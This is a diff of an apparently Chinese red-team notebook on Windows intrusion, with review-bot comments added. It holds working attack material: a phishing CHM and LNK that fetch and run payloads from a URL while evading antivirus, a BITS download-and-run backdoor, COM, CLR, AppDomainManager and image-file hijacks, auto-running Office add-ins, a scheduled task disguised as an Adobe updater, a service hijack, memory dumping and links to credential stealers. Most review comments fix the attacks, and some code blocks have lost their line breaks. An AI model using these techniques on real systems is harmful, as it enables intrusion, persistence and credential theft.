$ProcessId,
$FileStream.SafeFileHandle,
$MiniDumpWithFullMemory,
[IntPtr]::Zero,
[IntPtr]::Zero,
[IntPtr]::Zero))
$FileStream.Close()
if (-not $Result)
{
$Exception = New-Object ComponentModel.Win32Exception
$ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
# Remove any partially written dump files. For example, a partial dump will be written
# in the case when 32-bit PowerShell tries to dump a 64-bit process.
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
throw $ExceptionMessage
}
else
{
Get-ChildItem $ProcessDumpPath
}
}
END {}
}
```
参考链接:
{% embed url="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1" caption="" %}
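Review bot: the file is still named `dump/untitled.md` while its title is MiniDumpWriteDump; rename it before more links accumulate. In the C# block the output name `7kb.tmp` is hard-coded and the catch-all prints a usage hint for every failure, so the case the PowerSploit block below handles explicitly (32-bit PowerShell dumping a 64-bit process leaves a partial file) goes unnoticed; the magic `(uint)2` should also be named `MiniDumpWithFullMemory` as the ps1 does. The PowerSploit header with author and BSD-3 licence is correctly kept.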

dump/winpmem.md Normal file

@ -0,0 +1,6 @@
# WinPmem
参考链接:
{% embed url="https://github.com/FSecureLABS/physmem2profit" caption="" %}
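Review bot: the title says WinPmem but the only link is FSecureLABS/physmem2profit, a tool that uses the WinPmem driver to read physical memory; state that relationship in a sentence, and link the WinPmem project itself if the page is meant to be about the driver.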

file/chm/README.md Normal file

@ -0,0 +1,2 @@
# CHM

file/chm/phishing-chm.md Normal file

@ -0,0 +1,28 @@
# 钓鱼chm
```markup
<HTML>
<script>
function test() {
qwqdanchun.Click();
}
window.setTimeout("test()", 128);
</script>
<head>
<title>New Item</title>
<META content="text/html; charset=UTF-8" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 8.00.6001.18702"></HEAD>
<BODY dir=ltr bgColor=#ffffff>
<OBJECT id=qwqdanchun classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1 style="display:none">
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",conhost.exe, msiexec.exe /q /i http://127.0.0.1/Popup.msi">
</OBJECT>
</BODY>
</HTML>
```
推荐使用WinCHM制作msi文件自行打包制作注意不能选择管理员权限
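Review bot: the HTML is malformed (`<script>` precedes `<head>`, and the lowercase `<head>` is closed by `</HEAD>`), `Popup.msi` departs from the `qwqdanchun` naming convention, and the closing line runs two separate points together (the WinCHM recommendation; the MSI must not request administrator rights). For the analysis side, the `clsid:adb880a6-...` object is the HTML Help ActiveX control and its `ShortCut` command is what launches `conhost.exe` → `msiexec.exe`; `hh.exe` spawning those children is the chain a detection rule looks for.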

file/lnk/README.md Normal file

@ -0,0 +1,8 @@
# LNK
待整理
参考文章:
{% embed url="https://bbs.pediy.com/thread-260953.htm" caption="" %}

file/lnk/phishing-lnk.md Normal file

@ -0,0 +1,19 @@
# 钓鱼lnk
```text
$shell = New-Object -ComObject WScript.Shell;
$desktop = [System.Environment]::GetFolderPath('Desktop');
$shortcut = $shell.CreateShortcut("$desktop\qwqdanchun.lnk");
$shortcut.TargetPath = "C:\windows\system32\conhost.exe";
$shortcut.WindowStyle = 7;
$shortcut.Arguments = 'cmd.exe /c cd %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache & dir /s /B qwqdanchun*.exe | cmd.exe /k';
$shortcut.IconLocation = "https://127.0.0.1/qwqdanchun.exe?.ico";
$shortcut.Save();
```
利用icon缓存来下载文件并用conhost绕过杀软对进程链的判断。仅适用于win10win7等缓存目录不同有兴趣可以自行编写
参考文章:
{% embed url="https://isc.sans.edu/forums/diary/Using+Shell+Links+as+zerotouch+downloaders+and+to+initiate+network+connections/26276/" caption="" %}
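Review bot: the explanation is one run-on sentence that makes three claims (icon-cache download, `conhost.exe` as parent to defeat process-chain checks, Windows 10 only because the cache directory differs); separate them and say which directory differs on Windows 7 rather than "write it yourself". For the analysis side, note that `IconLocation` set to an `https://…?.ico` URL makes Explorer fetch the icon when the shortcut is rendered, so the artifacts are `explorer.exe` network traffic for an icon, an `.exe` landing in `INetCache`, and `conhost.exe` spawning `cmd.exe`.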

file/office.md Normal file

@ -0,0 +1,20 @@
# Office
待整理
参考文章:
{% embed url="https://www.anquanke.com/post/id/175548" caption="" %}
{% embed url="https://docs.microsoft.com/zh-cn/deployoffice/compat/office-file-format-reference" caption="" %}
{% embed url="https://docs.microsoft.com/zh-cn/previous-versions/office/gg615407%28v=office.14%29" caption="" %}
{% embed url="https://github.com/dotnetcore/NPOI" caption="" %}
{% embed url="https://github.com/xceedsoftware/DocX" caption="" %}
{% embed url="https://github.com/Sicos1977/OfficeExtractor" caption="" %}
{% embed url="https://github.com/EvotecIT/PSWriteWord" caption="" %}

file/pe.md Normal file

@ -0,0 +1,8 @@
# PE
待整理
参考文章:
{% embed url="https://bbs.pediy.com/thread-121488.htm" caption="" %}


@ -0,0 +1,6 @@
# 注入mstsc.exe
窃取远程桌面连接密码
{% embed url="https://github.com/0x09AL/RdpThief" caption="" %}

get-password/mimikatz.md Normal file

@ -0,0 +1,6 @@
# Mimikatz
Mimikatz
{% embed url="https://github.com/gentilkiwi/mimikatz/" caption="" %}


@ -0,0 +1,6 @@
# NPLogonNotify
参考链接:
{% embed url="https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy" caption="" %}

get-password/smb.md Normal file

@ -0,0 +1,10 @@
# SMB
使用恶意主题来窃取密码
{% embed url="https://www.bleepingcomputer.com/news/microsoft/windows-10-themes-can-be-abused-to-steal-windows-passwords/" caption="" %}
利用恶意pdf文件来窃取密码
{% embed url="https://research.checkpoint.com/2018/ntlm-credentials-theft-via-pdf-files/" caption="" %}

get-password/tickets.md Normal file

@ -0,0 +1,6 @@
# Tickets
Silver Tickets、Golden Tickets
{% embed url="https://en.hackndo.com/kerberos-silver-golden-tickets/" caption="" %}

inject/inject.md Normal file

@ -0,0 +1,8 @@
# 注入
## 原理: <a id="h3--"></a>
这篇文章讲的非常详细,重新整理一遍意义不大,直接看原文吧。
{% embed url="https://www.elastic.co/cn/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" caption="" %}

lateral-movement/dcom.md Normal file

@ -0,0 +1,2 @@
# DCOM

lateral-movement/hash.md Normal file

@ -0,0 +1,2 @@
# HASH


@ -0,0 +1,2 @@
# Kerberos tickets

lateral-movement/rpc.md Normal file

@ -0,0 +1,2 @@
# RPC

lateral-movement/wmi.md Normal file

@ -0,0 +1,2 @@
# WMI


@ -0,0 +1,2 @@
# BITS Jobs


@ -0,0 +1,18 @@
# BITS
## BITS <a id="h1-bits"></a>
后台智能传输服务它可以促进文件到Web服务器HTTP和共享文件夹SMB的传输能力。
可以滥用此功能以便在受感染的主机上下载有效负载可执行文件PowerShell脚本Scriptlet等并在给定时间执行这些文件
## 新建BITS Jobs后门 <a id="h1--bits-jobs-"></a>
```text
bitsadmin /create qwqdanchun
bitsadmin /addfile qwqdanchun "http://127.0.0.1/qwqdanchun.exe" "C:\Temp\qwqdanchun.exe"
bitsadmin /SetNotifyCmdLine qwqdanchun C:\Temp\qwqdanchun.exe NUL
bitsadmin /SetMinRetryDelay "qwqdanchun" 60
bitsadmin /resume qwqdanchun
```
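Review bot: the intro says payloads are executed "at a given time", but nothing in the commands schedules a time: `/SetNotifyCmdLine` runs `C:\Temp\qwqdanchun.exe` when the job finishes transferring (or errors), and `/SetMinRetryDelay 60` only sets how often a failing transfer is retried; state that explicitly. The section also lacks the defensive half that makes a persistence note useful: BITS jobs survive reboots, are enumerated with `bitsadmin /list /allusers /verbose` or `Get-BitsTransfer -AllUsers`, and job creation and state changes are logged in `Microsoft-Windows-Bits-Client/Operational`.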


@ -0,0 +1,2 @@
# COM劫持


@ -0,0 +1,100 @@
# COM劫持
## COM组件 <a id="h1-com-"></a>
COM是Windows中的一个系统用于在操作系统和软件组件之间进行交互对各种COM对象的引用存储在注册表中。劫持COM对象需要在注册表中进行更改以替换对合法系统组件的引用这可能导致该组件在执行时不起作用。
## 劫持CLR <a id="h1--clr"></a>
CLR全称Common Language Runtime中文名称为公共语言运行时。
CLR是.NET Framework的主要执行引擎作用之一是监视程序的运行。
在CLR之下运行的程序属于managed不在CLR之下直接运行的程序属于native。
此处主要以CLR的劫持作为实例因为其本质也是COM劫持但因为本身的特殊性经常被单独拿来说。
```text
#32bit
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"
wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"
SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
#64bit
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"
wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"
SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
SET KEY=HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
```
参考文章:
{% embed url="https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html" caption="" %}
## 劫持其他COM组件 <a id="h1--com-"></a>
操作的话与CLR劫持相同但是不再需要更改环境变量少了一步敏感操作具体使用自行取舍。
示例命令行:
```text
SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32
REG.EXE ADD %KEY% /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
```
原理类似故只列出常用的几个CLSID。
| CLSID |
| :--- |
| {42aedc87-2188-41fd-b9a3-0c966feabec1} |
| {fbeb8a05-beee-4442-804e-409d6c4515e9} |
| {b5f8350b-0548-48b1-a6ee-88bd00b4a5e7} |
| {BCDE0395-E52F-467C-8E3D-C4579291692E} |
| {F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1} |
| {3543619C-D563-43f7-95EA-4DA7E1CC396A} |
| {B056521A-9B10-425E-B616-1FCD828DB3B1} |
| {EFEF7FDB-0CED-4FB6-B3BB-3C50D39F4120} |
| {93E5752E-B889-47C5-8545-654EE2533C64} |
| {56FDF344-FD6D-11D0-958A-006097C9A090} |
| {2163EB1F-3FD9-4212-A41F-81D1F933597F} |
| {A6A2383F-AD50-4D52-8110-3508275E77F7} |
| {F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3} |
| {88D96A05-F192-11D4-A65F-0040963251E5} |
| {807583E5-5146-11D5-A672-00B0D022E945} |
| {529A9E6B-6587-4F23-AB9E-9C7D683E3C50} |
| {3CE74DE4-53D3-4D74-8B83-431B3828BA53} |
| {A4B544A1-438D-4B41-9325-869523E2D6C7} |
| {33C53A50-F456-4884-B049-85FD643ECFED} |
| {C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6} |
| {275C23E2-3747-11D0-9FEA-00AA003F8646} |
| {C15BB852-6F97-11D3-A990-00104B2A619F} |
| {ED475410-B0D6-11D2-8C3B-00104B2A6676} |
| {1299CF18-C4F5-4B6A-BB0F-2299F0398E27} |
| {DCB00C01-570F-4A9B-8D69-199FDBA5723B} |
| {C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6} |
| {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} |
自行寻找的话只需要去看下面两个注册表位置即可
```text
HKCU\Software\Classes\CLSID\HKCU\Software\Classes\Wow6432Node\CLSID\
```
## 一些特殊技巧 <a id="h1-u4E00u4E9Bu7279u6B8Au6280u5DE7"></a>
TreatAs可以模拟其他类的CLSID。
{% embed url="https://docs.microsoft.com/en-us/windows/win32/com/treatas" caption="" %}
利用零宽字节特性在Process Explorer等分析软件中隐藏劫持dll
{% embed url="https://en.wikipedia.org/wiki/Zero-width\_space" caption="" %}
{% embed url="https://fatrodzianko.com/2020/03/08/dll-side-loading-and-zero-width-spaces/" caption="" %}
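Review bot: the registry-location line `HKCU\Software\Classes\CLSID\HKCU\Software\Classes\Wow6432Node\CLSID\` has lost its line break and reads as one nonexistent path; it should be two entries, `HKCU\Software\Classes\CLSID\` and `HKCU\Software\Classes\Wow6432Node\CLSID\`. In the CLSID table, `{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}` is listed twice, and the table gives no hint of which process or component instantiates each class, which is the only thing that decides whether a hijack under HKCU ever fires; a second column naming the loader would make it usable. Two caveats belong in this section as well: per-user class registrations under `HKCU\Software\Classes` are ignored by processes running elevated, so none of these entries affects an admin-level process, and the hijacked DLL replaces the real class, so whatever used it stops working unless the DLL forwards the calls. The zero-width-space trick only hides the name visually; the path still differs byte-for-byte and a hash or a raw registry export exposes it.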


@ -0,0 +1,2 @@
# DLL劫持


@ -0,0 +1,57 @@
# 劫持.NET程序
## 劫持.NET程序AppDomainManager
### 首先制作要加载的恶意程序 <a id="h3-u9996u5148u5236u4F5Cu8981u52A0u8F7Du7684u6076u610Fu7A0Bu5E8F"></a>
C\#
```csharp
using System;
using System.Windows.Forms;
public sealed class MyAppDomainManager : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{
MessageBox.Show("AppDomainManager Injection");
return;
}
}
```
之后将其编译为qwqdanchun.dll。
### 注入方法一: <a id="h3--"></a>
命令行设置环境变量:
```text
set APPDOMAIN_MANAGER_ASM=qwqdanchun, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
set APPDOMAIN_MANAGER_TYPE=MyAppDomainManager
```
之后将qwqdanchun.dll与.net文件放在同一目录即可。
### 注入方法二: <a id="h3--"></a>
寻找要注入的exe文件此处示例使用qwqdanchun.exe并将做好的dll与其置于同一目录再将如下配置文件写入qwqdanchun.exe.config文件即可。
```markup
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/>
</startup>
<runtime>
<appDomainManagerAssembly value="qwqdanchun, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
<appDomainManagerType value="MyAppDomainManager" />
</runtime>
</configuration>
```
参考文章:
{% embed url="https://web.archive.org/web/20170919060201/http://subt0x10.blogspot.com/2017/06/attacking-clr-appdomainmanager-injection.html" caption="" %}
{% embed url="https://pentestlaboratories.com/tag/appdomainmanager-injection/" caption="" %}
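Review bot: method one as written is not persistence, because `set APPDOMAIN_MANAGER_ASM=...` and `set APPDOMAIN_MANAGER_TYPE=MyAppDomainManager` only affect the current cmd.exe session and its children; to survive, the two values must go into the user's environment (`setx`, or the `HKCU\Environment` values, the same way the CLR-profiler section uses `wmic ENVIRONMENT create`). Once they are there, every .NET Framework process the user starts tries to resolve `qwqdanchun, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null` from its own directory and fails to start when it cannot, which is loud; the `.exe.config` method scopes the injection to one target and should be called out as the quieter option. The C# sample also needs a reference to System.Windows.Forms for `MessageBox.Show`, and the text should say that `InitializeNewDomain` runs inside the target process before its `Main`, which is the whole point.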

File diff suppressed because it is too large Load Diff


@ -0,0 +1,2 @@
# 映像劫持


@ -0,0 +1,32 @@
# 映像劫持
## 劫持程序退出事件 <a id="h3-u52ABu6301u7A0Bu5E8Fu9000u51FAu4E8Bu4EF6"></a>
命令行
```text
# Use notepad as example
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\Temp\qwqdanchun.exe"
```
## 劫持程序调试选项 <a id="h3-u52ABu6301u7A0Bu5E8Fu8C03u8BD5u9009u9879"></a>
命令行
```text
copy C:\Temp\qwqdanchun.exe C:\Windows\System32\qwqdanchun.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "qwqdanchun.exe"
```
参考文章:
{% embed url="https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" caption="" %}
{% embed url="https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/" caption="" %}
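Review bot: the `Debugger` technique needs a sentence on what the payload receives. After `REG ADD "...\Image File Execution Options\notepad.exe" /v Debugger /d "qwqdanchun.exe"` Windows starts qwqdanchun.exe with the full notepad command line appended as its argument and does not start notepad itself, so unless the payload re-launches its argument, notepad never opens, which is an obvious tell. The `copy ... C:\Windows\System32\qwqdanchun.exe` step exists only so the bare name resolves; writing `/d "C:\Temp\qwqdanchun.exe"` makes it unnecessary. Both `REG ADD` lines lack `/f` and the `Debugger` and `MonitorProcess` lines lack `/t REG_SZ` (reg.exe defaults to REG_SZ, but state it for consistency with `GlobalFlag`). For the SilentProcessExit variant, say that `512` is `FLG_MONITOR_SILENT_PROCESS_EXIT` (0x200), that `ReportingMode` 1 means launch the monitor process, and that `MonitorProcess` is spawned each time notepad exits, not at startup. Both variants are under HKLM and need an elevated prompt.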


@ -0,0 +1,2 @@
# Office


@ -0,0 +1,23 @@
# COM劫持
Outlook在启动时会加载多个COM对象我们可以通过修改注册表的方式劫持Outlook的启动过程用来加载DLL。
```text
#32bit office on 32bit windows/64bit office on 64bit windows
reg add HKCU\Software\Classes\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /f
reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /f
reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f
reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /f
#32bit office on 64bit windows
reg add HKCU\Software\Classes\Wow6432Node\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /f
reg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /f
reg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f
reg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /f
```
参考文章:
{% embed url="https://www.welivesecurity.com/2018/08/22/turla-unique-outlook-backdoor/" caption="" %}
{% embed url="https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-Outlook/" caption="" %}
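Review bot: the hunk never says what `{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}` is or that `{49CBB1C7-97D1-485A-9EC1-A26065633066}` is a freshly chosen CLSID, so a reader cannot tell which GUID is fixed and which is theirs to pick; state that the first is the class Outlook instantiates and is being redirected, and the second is arbitrary (any unused GUID works). `TreatAs` also means Outlook now receives `C:\Temp\qwqdanchun.dll` instead of the real class, so the DLL must implement the original interfaces or that Outlook component breaks, which is worth a warning. The `reg add ... /t REG_SZ /d "Mail Plugin"` and `InprocServer32 /t REG_SZ /d "C:\Temp\qwqdanchun.dll"` lines write the `(Default)` value because no `/v` is given; that works, but the earlier COM page uses `/VE` explicitly, so say so or make them consistent. Finally, as with every HKCU class registration, an elevated Outlook (or any elevated process) ignores it.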


@ -0,0 +1,41 @@
# 模板文件
下文中的xlam、xla、ppam、ppa文件均为office模板文件在其中添加宏可以实现在打开文件时自动加载模板并执行宏的效果此处是一个简单的调用exe的宏示例
```text
Sub Auto_Open()
Set objShell = CreateObject("Wscript.Shell")
objShell.Exec ("C:\Temp\qwqdanchun.exe")
End Sub
```
## EXCEL VBA <a id="h3-excel-vba"></a>
命令行:
```text
#xlam
COPY C:\Temp\qwqdanchun.xlam %appdata%\Microsoft\Excel\XLSTART\qwqdanchun.xlam
#xla
COPY C:\Temp\qwqdanchun.xla %appdata%\Microsoft\Excel\XLSTART\qwqdanchun.xla
```
打开Excel时无论是新建的电子表格还是以前保存的电子表格都将执行该加载项。
## POWERPOINT VBA <a id="h3-powerpoint-vba"></a>
可以使用与Excel相同的方式来创建PowerPoint VBA加载项
```text
#ppam
COPY C:\Temp\qwqdanchun.ppam %appdata%\Microsoft\AddIns\qwqdanchun.ppam
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Autoload /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Path /t REG_DWORD /d "qwqdanchun.ppam" /f
#ppa
COPY C:\Temp\qwqdanchun.ppa %appdata%\Microsoft\AddIns\qwqdanchun.ppa
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Autoload /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Path /t REG_DWORD /d "qwqdanchun.ppa" /f
```
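Review bot: `reg add "...\PowerPoint\AddIns\qwqdanchun" /v Path /t REG_DWORD /d "qwqdanchun.ppam"` (and its `.ppa` twin) fails with "The parameter is incorrect", because a DWORD cannot hold a file name; `Path` is a string value, so use `/t REG_SZ`. The `15.0` in the key is the Office 2013 version and must match the installed Office (the XLL page says this, this page does not). The heading and first sentence call `.xlam`/`.xla`/`.ppam`/`.ppa` template files; they are add-ins (templates are `.xltm`/`.potm`), which matters because add-ins load silently at start while templates only apply to new documents. Worth adding for the Excel case: `%appdata%\Microsoft\Excel\XLSTART` is a default trusted location, which is why `Auto_Open` runs without a macro prompt; if Group Policy disables trusted locations or blocks macros, nothing happens.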


@ -0,0 +1,8 @@
# VSTO
参考文章:
{% embed url="https://bohops.com/2018/01/31/vsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules/" caption="" %}
{% embed url="https://vanmieghem.io/stealth-outlook-persistence/" caption="" %}


@ -0,0 +1,28 @@
# WLL/XLL
## WLL <a id="h3-wll"></a>
是指“.wll”扩展名的“Word加载项”。这是一个Word 97时代的老东西但似乎仍受支持。“.wll”文件本质上是具有Office特定扩展名的DLL。这意味着它支持基本的DLL功能因此您可以将“.dll”重命名为“.wll”来使用。
命令行:
```text
copy C:\Temp\qwqdanchun.dll %APPDATA%\Microsoft\Word\Startup\qwqdanchun.wll
```
## XLL <a id="h3-xll"></a>
类似于WLL也是具有Office特定扩展名的DLL适用于Excel。但是其dll构造时注意要将恶意代码放在导出函数“xlAutoOpen”中来保证其被加载。
命令行:
```text
copy C:\Temp\qwqdanchun.dll %APPDATA%\Microsoft\AddIns\qwqdanchun.xll
#remember to change “15.0” to your version
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Options" /v OPEN /t REG_SZ /d "/R qwqdanchun.xll”
```
参考文章:
{% embed url="https://labs.f-secure.com/archive/add-in-opportunities-for-office-persistence/" caption="" %}
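Review bot: the last command, `reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Options" /v OPEN /t REG_SZ /d "/R qwqdanchun.xll”`, ends with a typographic closing quote (”) instead of `"`, so the command line will not parse; replace it. Two facts the hunk should carry: the DLL's bitness must match Office's (a 64-bit `.wll`/`.xll` under 32-bit Office simply does not load), and `OPEN` is only the value name for the first add-in, later ones are `OPEN1`, `OPEN2`, ..., so writing `OPEN` blindly overwrites a legitimate entry if one exists. For `.wll`, Word loads the file with `LoadLibrary`, so a `DllMain`-only payload works; for `.xll`, `DllMain` also runs first, but Excel then rejects a file without `xlAutoOpen` as an invalid add-in and shows an error, which is the reason the text gives for putting the code in `xlAutoOpen`, and it should say so.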


@ -0,0 +1,2 @@
# Rootkit


@ -0,0 +1,26 @@
# Rootkit
此处仅讨论狭义的Rootkit也就是通过加载驱动进入r0实现的权限维持。
## 方法一: <a id="h3--"></a>
利用现有驱动漏洞实现获取ring0权限并长期驻留。
## 方法二: <a id="h3--"></a>
自己制作驱动,并添加数字签名,以加载进系统,并驻留。
## 备注: <a id="h3--"></a>
无论是挖掘漏洞还是自己写驱动都需要多方面的知识所以此处无法列出合适的POC但是我会将一些相关资料列在下方有兴趣的同学可以自己学习。
开源实例:
{% embed url="https://github.com/uf0o/rootkit-arsenal-guacamole" caption="" %}
参考文章:
{% embed url="https://en.wikipedia.org/wiki/Rootkit" caption="" %}
{% embed url="https://bbs.pediy.com/thread-260708.htm" caption="" %}
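Review bot: 方法二 ("自己制作驱动,并添加数字签名") understates what the signature has to be. Since Windows 10 1607 with Secure Boot on, a new kernel driver must be signed through Microsoft's attestation or WHQL process; an ordinary code-signing certificate is not enough, and the only alternatives are test-signing mode, Secure Boot off, or a cross-signing certificate issued before the 2015 cut-off. That is why 方法一 (abusing an already-signed vulnerable driver) is the route that is actually used, and a sentence on it would save readers from going down the self-signing path. The `rootkit-arsenal-guacamole` link is an unsigned educational driver and only loads with test signing enabled or DSE disabled; say so next to it.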


@ -0,0 +1,2 @@
# 计划任务


@ -0,0 +1,24 @@
# 新建任务
命令行:
```text
# On System Startschtasks /create /tn qwqdanchun /tr "c:\Temp\qwqdanchun.exe" /sc onstart /ru System# On User Idle (30mins)schtasks /create /tn qwqdanchun /tr "c:\Temp\qwqdanchun.exe" /sc onidle /i 30# On User Loginschtasks /create /tn qwqdanchun /tr "c:\Temp\qwqdanchun.exe" /sc onlogon /ru System
```
Powershell
```text
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c c:\Temp\qwqdanchun.exe"$T = New-ScheduledTaskTrigger -AtLogOn -User "qwqdanchun"$P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest$S = New-ScheduledTaskSettingsSet$P = New-ScheduledTaskPrincipal "qwqdanchun"$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $SRegister-ScheduledTask qwqdanchun -InputObjec $D
```
C\#
```text
using Microsoft.Win32.TaskScheduler;using System;namespace demo{ static class Program { static void Main() { TaskService ts = new TaskService(); TaskDefinition td = ts.NewTask(); td.RegistrationInfo.Description = "This task keeps your Adobe Reader and Acrobat applications up to date with the latest enhancements and security fixes"; td.RegistrationInfo.Author = "Adobe Scheduler"; TimeTrigger dt = new TimeTrigger(); dt.StartBoundary = Convert.ToDateTime(DateTime.Now.ToString("yyyy-MM-dd 06:30:00")); dt.Repetition.Interval = TimeSpan.FromMinutes(5); td.Triggers.Add(dt); td.Settings.DisallowStartIfOnBatteries = false; td.Settings.RunOnlyIfNetworkAvailable = true; td.Settings.RunOnlyIfIdle = false; td.Settings.DisallowStartIfOnBatteries = false; td.Actions.Add(new ExecAction(@"c:\Temp\qwqdanchun.exe", "", null)); ts.RootFolder.RegisterTaskDefinition(@"Adobe Acrobat Update Task", td); } }}
```
参考文章:
{% embed url="https://docs.microsoft.com/zh-cn/windows/win32/taskschd/using-the-task-scheduler" caption="" %}
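Review bot: all three code blocks in this hunk have had their line breaks stripped, so `# On System Startschtasks /create /tn qwqdanchun ...# On User Idle (30mins)schtasks ...` is one unrunnable line with comments glued onto commands; restore one statement per line in the cmd, PowerShell and C# blocks. In the PowerShell block `$P` is assigned twice (`New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest` and then `New-ScheduledTaskPrincipal "qwqdanchun"`), so the task runs as the user, not SYSTEM; keep one, and spell `-InputObjec` as `-InputObject`. The `/sc onidle /i 30` task has no `/ru`, so it runs as the creating user unlike its siblings. The C# block depends on the third-party `Microsoft.Win32.TaskScheduler` NuGet package, not the Windows SDK; name the dependency. All three variants need an elevated prompt to register a task as SYSTEM or at boot.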


@ -0,0 +1,2 @@
# 服务


@ -0,0 +1,16 @@
# 修改服务
修改Fax服务文件路径
```text
sc config Fax binPath= "C:\Temp\qwqdanchun.exe" start="auto" obj="LocalSystem"
sc start Fax
```
```text
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Fax" /v ImagePath /t REG_SZ /d "C:\Temp\qwqdanchun.exe" /f
```
